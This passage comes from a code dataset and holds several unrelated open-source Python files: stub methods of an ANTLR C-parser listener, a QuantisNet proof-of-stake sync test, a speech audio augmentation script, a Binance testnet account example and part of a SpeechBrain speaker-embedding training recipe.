# Enter a parse tree produced by CParser#type_specifier.
# @param ctx Type: CParser.Type_specifierContext
def enterType_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#type_specifier.
# @param ctx Type: CParser.Type_specifierContext
def exitType_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#type_id.
# @param ctx Type: CParser.Type_idContext
def enterType_id(self,ctx):
pass
# Exit a parse tree produced by CParser#type_id.
# @param ctx Type: CParser.Type_idContext
def exitType_id(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_or_union_specifier.
# @param ctx Type: CParser.Struct_or_union_specifierContext
def enterStruct_or_union_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_or_union_specifier.
# @param ctx Type: CParser.Struct_or_union_specifierContext
def exitStruct_or_union_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_or_union.
# @param ctx Type: CParser.Struct_or_unionContext
def enterStruct_or_union(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_or_union.
# @param ctx Type: CParser.Struct_or_unionContext
def exitStruct_or_union(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declaration_list.
# @param ctx Type: CParser.Struct_declaration_listContext
def enterStruct_declaration_list(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declaration_list.
# @param ctx Type: CParser.Struct_declaration_listContext
def exitStruct_declaration_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declaration.
# @param ctx Type: CParser.Struct_declarationContext
def enterStruct_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declaration.
# @param ctx Type: CParser.Struct_declarationContext
def exitStruct_declaration(self,ctx):
pass
# Enter a parse tree produced by CParser#specifier_qualifier_list.
# @param ctx Type: CParser.Specifier_qualifier_listContext
def enterSpecifier_qualifier_list(self,ctx):
pass
# Exit a parse tree produced by CParser#specifier_qualifier_list.
# @param ctx Type: CParser.Specifier_qualifier_listContext
def exitSpecifier_qualifier_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declarator_list.
# @param ctx Type: CParser.Struct_declarator_listContext
def enterStruct_declarator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declarator_list.
# @param ctx Type: CParser.Struct_declarator_listContext
def exitStruct_declarator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declarator.
# @param ctx Type: CParser.Struct_declaratorContext
def enterStruct_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declarator.
# @param ctx Type: CParser.Struct_declaratorContext
def exitStruct_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#enum_specifier.
# @param ctx Type: CParser.Enum_specifierContext
def enterEnum_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#enum_specifier.
# @param ctx Type: CParser.Enum_specifierContext
def exitEnum_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#enumerator_list.
# @param ctx Type: CParser.Enumerator_listContext
def enterEnumerator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#enumerator_list.
# @param ctx Type: CParser.Enumerator_listContext
def exitEnumerator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#enumerator.
# @param ctx Type: CParser.EnumeratorContext
def enterEnumerator(self,ctx):
pass
# Exit a parse tree produced by CParser#enumerator.
# @param ctx Type: CParser.EnumeratorContext
def exitEnumerator(self,ctx):
pass
# Enter a parse tree produced by CParser#type_qualifier.
# @param ctx Type: CParser.Type_qualifierContext
def enterType_qualifier(self,ctx):
pass
# Exit a parse tree produced by CParser#type_qualifier.
# @param ctx Type: CParser.Type_qualifierContext
def exitType_qualifier(self,ctx):
pass
# Enter a parse tree produced by CParser#declarator.
# @param ctx Type: CParser.DeclaratorContext
def enterDeclarator(self,ctx):
pass
# Exit a parse tree produced by CParser#declarator.
# @param ctx Type: CParser.DeclaratorContext
def exitDeclarator(self,ctx):
pass
# Enter a parse tree produced by CParser#direct_declarator.
# @param ctx Type: CParser.Direct_declaratorContext
def enterDirect_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#direct_declarator.
# @param ctx Type: CParser.Direct_declaratorContext
def exitDirect_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#declarator_suffix.
# @param ctx Type: CParser.Declarator_suffixContext
def enterDeclarator_suffix(self,ctx):
pass
# Exit a parse tree produced by CParser#declarator_suffix.
# @param ctx Type: CParser.Declarator_suffixContext
def exitDeclarator_suffix(self,ctx):
pass
# Enter a parse tree produced by CParser#pointer.
# @param ctx Type: CParser.PointerContext
def enterPointer(self,ctx):
pass
# Exit a parse tree produced by CParser#pointer.
# @param ctx Type: CParser.PointerContext
def exitPointer(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_type_list.
# @param ctx Type: CParser.Parameter_type_listContext
def enterParameter_type_list(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_type_list.
# @param ctx Type: CParser.Parameter_type_listContext
def exitParameter_type_list(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_list.
# @param ctx Type: CParser.Parameter_listContext
def enterParameter_list(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_list.
# @param ctx Type: CParser.Parameter_listContext
def exitParameter_list(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_declaration.
# @param ctx Type: CParser.Parameter_declarationContext
def enterParameter_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_declaration.
# @param ctx Type: CParser.Parameter_declarationContext
def exitParameter_declaration(self,ctx):
pass
# Enter a parse tree produced by CParser#identifier_list.
# @param ctx Type: CParser.Identifier_listContext
def enterIdentifier_list(self,ctx):
pass
# Exit a parse tree produced by CParser#identifier_list.
# @param ctx Type: CParser.Identifier_listContext
def exitIdentifier_list(self,ctx):
pass
# Enter a parse tree produced by CParser#type_name.
# @param ctx Type: CParser.Type_nameContext
def enterType_name(self,ctx):
pass
# Exit a parse tree produced by CParser#type_name.
# @param ctx Type: CParser.Type_nameContext
def exitType_name(self,ctx):
pass
# Enter a parse tree produced by CParser#abstract_declarator.
# @param ctx Type: CParser.Abstract_declaratorContext
def enterAbstract_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#abstract_declarator.
# @param ctx Type: CParser.Abstract_declaratorContext
def exitAbstract_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#direct_abstract_declarator.
# @param ctx Type: CParser.Direct_abstract_declaratorContext
def enterDirect_abstract_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#direct_abstract_declarator.
# @param ctx Type: CParser.Direct_abstract_declaratorContext
def exitDirect_abstract_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#abstract_declarator_suffix.
# @param ctx Type: CParser.Abstract_declarator_suffixContext
def enterAbstract_declarator_suffix(self,ctx):
pass
# Exit a parse tree produced by CParser#abstract_declarator_suffix.
# @param ctx Type: CParser.Abstract_declarator_suffixContext
def exitAbstract_declarator_suffix(self,ctx):
pass
# Enter a parse tree produced by CParser#initializer.
# @param ctx Type: CParser.InitializerContext
def enterInitializer(self,ctx):
pass
# Exit a parse tree produced by CParser#initializer.
# @param ctx Type: CParser.InitializerContext
def exitInitializer(self,ctx):
pass
# Enter a parse tree produced by CParser#initializer_list.
# @param ctx Type: CParser.Initializer_listContext
def enterInitializer_list(self,ctx):
pass
# Exit a parse tree produced by CParser#initializer_list.
# @param ctx Type: CParser.Initializer_listContext
def exitInitializer_list(self,ctx):
pass
# Enter a parse tree produced by CParser#argument_expression_list.
# @param ctx Type: CParser.Argument_expression_listContext
def enterArgument_expression_list(self,ctx):
pass
# Exit a parse tree produced by CParser#argument_expression_list.
# @param ctx Type: CParser.Argument_expression_listContext
def exitArgument_expression_list(self,ctx):
pass
# Enter a parse tree produced by CParser#additive_expression.
# @param ctx Type: CParser.Additive_expressionContext
def enterAdditive_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#additive_expression.
# @param ctx Type: CParser.Additive_expressionContext
def exitAdditive_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#multiplicative_expression.
# @param ctx Type: CParser.Multiplicative_expressionContext
def enterMultiplicative_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#multiplicative_expression.
# @param ctx Type: CParser.Multiplicative_expressionContext
def exitMultiplicative_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#cast_expression.
# @param ctx Type: CParser.Cast_expressionContext
def enterCast_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#cast_expression.
# @param ctx Type: CParser.Cast_expressionContext
def exitCast_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#unary_expression.
# @param ctx Type: CParser.Unary_expressionContext
def enterUnary_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#unary_expression.
# @param ctx Type: CParser.Unary_expressionContext
def exitUnary_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#postfix_expression.
# @param ctx Type: CParser.Postfix_expressionContext
def enterPostfix_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#postfix_expression.
# @param ctx Type: CParser.Postfix_expressionContext
def exitPostfix_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#macro_parameter_list.
# @param ctx Type: CParser.Macro_parameter_listContext
def enterMacro_parameter_list(self,ctx):
pass
# Exit a parse tree produced by CParser#macro_parameter_list.
# @param ctx Type: CParser.Macro_parameter_listContext
def exitMacro_parameter_list(self,ctx):
pass
# Enter a parse tree produced by CParser#unary_operator.
# @param ctx Type: CParser.Unary_operatorContext
def enterUnary_operator(self,ctx):
pass
# Exit a parse tree produced by CParser#unary_operator.
# @param ctx Type: CParser.Unary_operatorContext
def exitUnary_operator(self,ctx):
pass
# Enter a parse tree produced by CParser#primary_expression.
# @param ctx Type: CParser.Primary_expressionContext
def enterPrimary_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#primary_expression.
# @param ctx Type: CParser.Primary_expressionContext
def exitPrimary_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#constant.
# @param ctx Type: CParser.ConstantContext
def enterConstant(self,ctx):
pass
# Exit a parse tree produced by CParser#constant.
# @param ctx Type: CParser.ConstantContext
def exitConstant(self,ctx):
pass
# Enter a parse tree produced by CParser#expression.
# @param ctx Type: CParser.ExpressionContext
def enterExpression(self,ctx):
pass
# Exit a parse tree produced by CParser#expression.
# @param ctx Type: CParser.ExpressionContext
def exitExpression(self,ctx):
pass
# Enter a parse tree produced by CParser#constant_expression.
# @param ctx Type: CParser.Constant_expressionContext
def enterConstant_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#constant_expression.
# @param ctx Type: CParser.Constant_expressionContext
def exitConstant_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#assignment_expression.
# @param ctx Type: CParser.Assignment_expressionContext
def enterAssignment_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#assignment_expression.
# @param ctx Type: CParser.Assignment_expressionContext
def exitAssignment_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#lvalue.
# @param ctx Type: CParser.LvalueContext
def enterLvalue(self,ctx):
pass
# Exit a parse tree produced by CParser#lvalue.
# @param ctx Type: CParser.LvalueContext
def exitLvalue(self,ctx):
pass
# Enter a parse tree produced by CParser#assignment_operator.
# @param ctx Type: CParser.Assignment_operatorContext
def enterAssignment_operator(self,ctx):
pass
# Exit a parse tree produced by CParser#assignment_operator.
# @param ctx Type: CParser.Assignment_operatorContext
def exitAssignment_operator(self,ctx):
pass
# Enter a parse tree produced by CParser#conditional_expression.
# @param ctx Type: CParser.Conditional_expressionContext
def enterConditional_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#conditional_expression.
# @param ctx Type: CParser.Conditional_expressionContext
def exitConditional_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#logical_or_expression.
# @param ctx Type: CParser.Logical_or_expressionContext
def enterLogical_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#logical_or_expression.
# @param ctx Type: CParser.Logical_or_expressionContext
def exitLogical_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#logical_and_expression.
# @param ctx Type: CParser.Logical_and_expressionContext
def enterLogical_and_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#logical_and_expression.
# @param ctx Type: CParser.Logical_and_expressionContext
def exitLogical_and_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#inclusive_or_expression.
# @param ctx Type: CParser.Inclusive_or_expressionContext
def enterInclusive_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#inclusive_or_expression.
# @param ctx Type: CParser.Inclusive_or_expressionContext
def exitInclusive_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#exclusive_or_expression.
# @param ctx Type: CParser.Exclusive_or_expressionContext
def enterExclusive_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#exclusive_or_expression.
# @param ctx Type: CParser.Exclusive_or_expressionContext
def exitExclusive_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#and_expression.
# @param ctx Type: CParser.And_expressionContext
def enterAnd_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#and_expression.
# @param ctx Type: CParser.And_expressionContext
def exitAnd_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#equality_expression.
# @param ctx Type: CParser.Equality_expressionContext
def enterEquality_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#equality_expression.
# @param ctx Type: CParser.Equality_expressionContext
def exitEquality_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#relational_expression.
# @param ctx Type: CParser.Relational_expressionContext
def enterRelational_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#relational_expression.
# @param ctx Type: CParser.Relational_expressionContext
def exitRelational_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#shift_expression.
# @param ctx Type: CParser.Shift_expressionContext
def enterShift_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#shift_expression.
# @param ctx Type: CParser.Shift_expressionContext
def exitShift_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#statement.
# @param ctx Type: CParser.StatementContext
def enterStatement(self,ctx):
pass
# Exit a parse tree produced by CParser#statement.
# @param ctx Type: CParser.StatementContext
def exitStatement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm2_statement.
# @param ctx Type: CParser.Asm2_statementContext
def enterAsm2_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm2_statement.
# @param ctx Type: CParser.Asm2_statementContext
def exitAsm2_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm1_statement.
# @param ctx Type: CParser.Asm1_statementContext
def enterAsm1_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm1_statement.
# @param ctx Type: CParser.Asm1_statementContext
def exitAsm1_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm_statement.
# @param ctx Type: CParser.Asm_statementContext
def enterAsm_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm_statement.
# @param ctx Type: CParser.Asm_statementContext
def exitAsm_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#macro_statement.
# @param ctx Type: CParser.Macro_statementContext
def enterMacro_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#macro_statement.
# @param ctx Type: CParser.Macro_statementContext
def exitMacro_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#labeled_statement.
# @param ctx Type: CParser.Labeled_statementContext
def enterLabeled_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#labeled_statement.
# @param ctx Type: CParser.Labeled_statementContext
def exitLabeled_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#compound_statement.
# @param ctx Type: CParser.Compound_statementContext
def enterCompound_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#compound_statement.
# @param ctx Type: CParser.Compound_statementContext
def exitCompound_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#statement_list.
# @param ctx Type: CParser.Statement_listContext
def enterStatement_list(self,ctx):
pass
# Exit a parse tree produced by CParser#statement_list.
# @param ctx Type: CParser.Statement_listContext
def exitStatement_list(self,ctx):
pass
# Enter a parse tree produced by CParser#expression_statement.
# @param ctx Type: CParser.Expression_statementContext
def enterExpression_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#expression_statement.
# @param ctx Type: CParser.Expression_statementContext
def exitExpression_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#selection_statement.
# @param ctx Type: CParser.Selection_statementContext
def enterSelection_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#selection_statement.
# @param ctx Type: CParser.Selection_statementContext
def exitSelection_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#iteration_statement.
# @param ctx Type: CParser.Iteration_statementContext
def enterIteration_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#iteration_statement.
# @param ctx Type: CParser.Iteration_statementContext
def exitIteration_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#jump_statement.
# @param ctx Type: CParser.Jump_statementContext
def enterJump_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#jump_statement.
# @param ctx Type: CParser.Jump_statementContext
def exitJump_statement(self,ctx):
pass
| 31.848148 | 78 | 0.720743 |
79a82a179ae9aba21609ecce90fc11f8aed3a291 | 2,533 | py | Python | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 21 | 2019-06-03T22:24:33.000Z | 2021-04-10T14:14:26.000Z | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 3 | 2019-08-22T16:21:45.000Z | 2020-02-26T15:19:21.000Z | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 4 | 2019-06-04T22:11:05.000Z | 2020-05-22T18:20:32.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 The QuantisNet Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import logging
class PoSSyncTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
node_args = ["-keypool=10", "-debug=stake", "-debug=net"]
self.extra_args = [node_args, node_args, node_args, node_args]
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, self.extra_args)
connect_nodes_bi(self.nodes, 0, 1)
connect_nodes_bi(self.nodes, 0, 2)
connect_nodes_bi(self.nodes, 1, 2)
self.is_network_split=False
sync_blocks(self.nodes[:3])
self.nodes[0].spork('SPORK_15_FIRST_POS_BLOCK', 103)
def run_test(self):
logging.info("Generating initial blockchain")
self.nodes[0].generate(100)
sync_blocks(self.nodes[:3])
self.nodes[1].generate(1)
sync_blocks(self.nodes[:3])
self.nodes[2].generate(1)
sync_blocks(self.nodes[:3])
assert_equal(self.nodes[0].getbalance(), 2*MINER_REWARD_DEC)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
assert_equal(self.nodes[3].getbalance(), 0)
logging.info("Switching to PoS")
assert_equal(self.nodes[0].getblockchaininfo()['pos'], False)
self.nodes[0].generate(1, 10)
sync_blocks(self.nodes[:3])
assert_equal(self.nodes[0].getblockchaininfo()['pos'], True)
assert_equal(self.nodes[3].getblockchaininfo()['pos'], False)
logging.info("Adding more PoS blocks")
for i in range(1000):
set_node_times(self.nodes, GENESISTIME + i*180)
assert_equal(len(self.nodes[0].generate(5, 50)), 5)
return
logging.info("Syncing from scratch")
connect_nodes_bi(self.nodes, 3, 0)
connect_nodes_bi(self.nodes, 3, 1)
connect_nodes_bi(self.nodes, 3, 2)
self.sync_all()
assert_equal(self.nodes[3].getblockchaininfo()['pos'], True)
assert_equal(self.nodes[0].getinfo()['blocks'], 5103)
assert_equal(self.nodes[3].getinfo()['blocks'], 5103)
if __name__ == '__main__':
PoSSyncTest().main()
| 38.378788 | 86 | 0.652191 |
50f918720a5e572acd4edb224aeeebcf7bbb3315 | 2,913 | py | Python | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | 3 | 2020-12-21T19:08:50.000Z | 2021-06-05T09:27:49.000Z | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | null | null | null | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | null | null | null | from utils import *
from tuners import *
from configs import Arguments as args
from random import randrange
import ffmpeg
import sys
# [TO DO] rewrite metadata.csv to record metadata of augmented dataset
def change_sampling_rate():
save_dir = create_dir(args.save_dir)
resampled_wav_dir = create_dir(save_dir, "resampled_wavs")
dataset_name_list = [ wav_path.split("/")[-1] for wav_path in args.wav_paths ]
resampled_dataset_paths = [ create_dir(get_path(resampled_wav_dir, dataset_name)) for dataset_name in dataset_name_list ]
all_in_wav_paths = [get_speech_path(path) for path in args.wav_paths]
all_out_wav_paths = [list(map( lambda path: get_path(resampled_dataset_paths[idx], path.split("/")[-1]), wav_paths )) for idx, wav_paths in enumerate(all_in_wav_paths)]
for idx, in_wav_paths in enumerate(all_in_wav_paths):
print("\n\t[LOG] {} / {} processed...".format(idx+1, len(all_in_wav_paths)))
do_multiprocessing(resample_wav, list(zip(in_wav_paths, all_out_wav_paths[idx], [args.sampling_rate for _ in range(len(in_wav_paths))])), args.num_jobs)
def augment_f(path):
in_wav_path, out_wav_path = path
audio = read_wav(in_wav_path, args.sampling_rate)
for _ in range(args.augment_repeat_numb):
augmented_audios = [ pitch_augment(audio, args.sampling_rate),
speed_augment(audio, low=0.5, high=1.8),
pitch_and_speed_augment(audio, low=0.5, high=1.8)]
out_wav_paths = [ out_wav_path.replace(".wav", "") + postfix + str(augmented_audios[idx][1]) + ".wav" for idx, postfix in enumerate(("_pitch_", "_speed_", "_pitch_and_speed_"))]
[write_wav(out_wav_paths[idx], audio[0], args.sampling_rate, args.max_wav_value) for idx, audio in enumerate(augmented_audios)]
def augment_data():
save_dir = create_dir(args.save_dir)
augmented_wav_dir = create_dir(save_dir, "augmented_wavs")
dataset_name_list = [ wav_path.split("/")[-1] for wav_path in args.wav_paths ]
augmented_dataset_paths = [ create_dir(get_path(augmented_wav_dir, dataset_name)) for dataset_name in dataset_name_list ]
all_in_wav_paths = [get_speech_path(get_path(args.save_dir, "resampled_wavs", dataset_name)) for dataset_name in dataset_name_list]
all_out_wav_paths = [list(map( lambda path: get_path(augmented_dataset_paths[idx], path.split("/")[-1]), wav_paths )) for idx, wav_paths in enumerate(all_in_wav_paths)]
for idx, in_wav_paths in enumerate(all_in_wav_paths):
print("\n\t[LOG] {} / {} processed...".format(idx+1, len(all_in_wav_paths)))
print(len(list(zip(in_wav_paths, all_out_wav_paths[idx]))))
do_multiprocessing(augment_f, list(zip(in_wav_paths, all_out_wav_paths[idx])), args.num_jobs)
if __name__ == "__main__":
if sys.argv[1] in ["True", True, 1, "1"]:
print("\n[LOG] start to change sampling rate of wav-signal")
change_sampling_rate()
if sys.argv[2] in ["True", True, 1, "1"]:
print("\n[LOG] start to augment prosodies of speech dataset")
augment_data()
| 45.515625 | 179 | 0.752832 |
b27c09b92a316e99fc41e18615536801c8a0635b | 300 | py | Python | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | 3 | 2021-08-16T15:29:09.000Z | 2021-09-14T16:25:03.000Z | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | null | null | null | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import logging
from binance.futures import Futures as Client
from binance.lib.utils import config_logging
config_logging(logging, logging.DEBUG)
key = ""
secret = ""
client = Client(key, secret, base_url="https://testnet.binancefuture.com")
logging.info(client.brackets())
| 20 | 74 | 0.766667 |
5757600aad6de6927121532a0e38e9061fd17993 | 8,772 | py | Python | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
"""Recipe for training speaker embeddings (e.g, xvectors) using the VoxCeleb Dataset.
We employ an encoder followed by a speaker classifier.
To run this recipe, use the following command:
> python train_speaker_embeddings.py {hyperparameter_file}
Using your own hyperparameter file or one of the following:
hyperparams/train_x_vectors.yaml (for standard xvectors)
hyperparams/train_ecapa_tdnn.yaml (for the ecapa+tdnn system)
Author
* Mirco Ravanelli 2020
* Hwidong Na 2020
* Nauman Dawalatabad 2020
"""
import os
import sys
import random
import torch
import torchaudio
import speechbrain as sb
from speechbrain.utils.data_utils import download_file
from hyperpyyaml import load_hyperpyyaml
from speechbrain.utils.distributed import run_on_main
class SpeakerBrain(sb.core.Brain):
"""Class for speaker embedding training"
"""
def compute_forward(self, batch, stage):
"""Computation pipeline based on a encoder + speaker classifier.
Data augmentation and environmental corruption are applied to the
input speech.
"""
batch = batch.to(self.device)
wavs, lens = batch.sig
if stage == sb.Stage.TRAIN:
# Applying the augmentation pipeline
wavs_aug_tot = []
wavs_aug_tot.append(wavs)
for count, augment in enumerate(self.hparams.augment_pipeline):
# Apply augment
wavs_aug = augment(wavs, lens)
# Managing speed change
if wavs_aug.shape[1] > wavs.shape[1]:
wavs_aug = wavs_aug[:, 0 : wavs.shape[1]]
else:
zero_sig = torch.zeros_like(wavs)
zero_sig[:, 0 : wavs_aug.shape[1]] = wavs_aug
wavs_aug = zero_sig
if self.hparams.concat_augment:
wavs_aug_tot.append(wavs_aug)
else:
wavs = wavs_aug
wavs_aug_tot[0] = wavs
wavs = torch.cat(wavs_aug_tot, dim=0)
self.n_augment = len(wavs_aug_tot)
lens = torch.cat([lens] * self.n_augment)
# Feature extraction and normalization
feats = self.modules.compute_features(wavs)
feats = self.modules.mean_var_norm(feats, lens)
# Embeddings + speaker classifier
embeddings = self.modules.embedding_model(feats)
outputs = self.modules.classifier(embeddings)
return outputs, lens
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss using speaker-id as label.
"""
predictions, lens = predictions
uttid = batch.id
spkid, _ = batch.spk_id_encoded
# Concatenate labels (due to data augmentation)
if stage == sb.Stage.TRAIN:
spkid = torch.cat([spkid] * self.n_augment, dim=0)
loss = self.hparams.compute_cost(predictions, spkid, lens)
if stage == sb.Stage.TRAIN and hasattr(
self.hparams.lr_annealing, "on_batch_end"
):
self.hparams.lr_annealing.on_batch_end(self.optimizer)
if stage != sb.Stage.TRAIN:
self.error_metrics.append(uttid, predictions, spkid, lens)
return loss
def on_stage_start(self, stage, epoch=None):
"""Gets called at the beginning of an epoch."""
if stage != sb.Stage.TRAIN:
self.error_metrics = self.hparams.error_stats()
def on_stage_end(self, stage, stage_loss, epoch=None):
"""Gets called at the end of an epoch."""
# Compute/store important stats
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
else:
stage_stats["ErrorRate"] = self.error_metrics.summarize("average")
# Perform end-of-iteration things, like annealing, logging, etc.
if stage == sb.Stage.VALID:
old_lr, new_lr = self.hparams.lr_annealing(epoch)
sb.nnet.schedulers.update_learning_rate(self.optimizer, new_lr)
self.hparams.train_logger.log_stats(
stats_meta={"epoch": epoch, "lr": old_lr},
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta={"ErrorRate": stage_stats["ErrorRate"]},
min_keys=["ErrorRate"],
)
def dataio_prep(hparams):
"Creates the datasets and their data processing pipelines."
data_folder = hparams["data_folder"]
# 1. Declarations:
train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["train_annotation"],
replacements={"data_root": data_folder},
)
valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["valid_annotation"],
replacements={"data_root": data_folder},
)
datasets = [train_data, valid_data]
label_encoder = sb.dataio.encoder.CategoricalEncoder()
snt_len_sample = int(hparams["sample_rate"] * hparams["sentence_len"])
# 2. Define audio pipeline:
@sb.utils.data_pipeline.takes("wav", "start", "stop", "duration")
@sb.utils.data_pipeline.provides("sig")
def audio_pipeline(wav, start, stop, duration):
if hparams["random_chunk"]:
duration_sample = int(duration * hparams["sample_rate"])
start = random.randint(0, duration_sample - snt_len_sample)
stop = start + snt_len_sample
else:
start = int(start)
stop = int(stop)
num_frames = stop - start
sig, fs = torchaudio.load(
wav, num_frames=num_frames, frame_offset=start
)
sig = sig.transpose(0, 1).squeeze(1)
return sig
sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
# 3. Define text pipeline:
@sb.utils.data_pipeline.takes("spk_id")
@sb.utils.data_pipeline.provides("spk_id", "spk_id_encoded")
def label_pipeline(spk_id):
yield spk_id
spk_id_encoded = label_encoder.encode_sequence_torch([spk_id])
yield spk_id_encoded
sb.dataio.dataset.add_dynamic_item(datasets, label_pipeline)
# 3. Fit encoder:
# Load or compute the label encoder (with multi-GPU DDP support)
lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt")
label_encoder.load_or_create(
path=lab_enc_file, from_didatasets=[train_data], output_key="spk_id",
)
# 4. Set output:
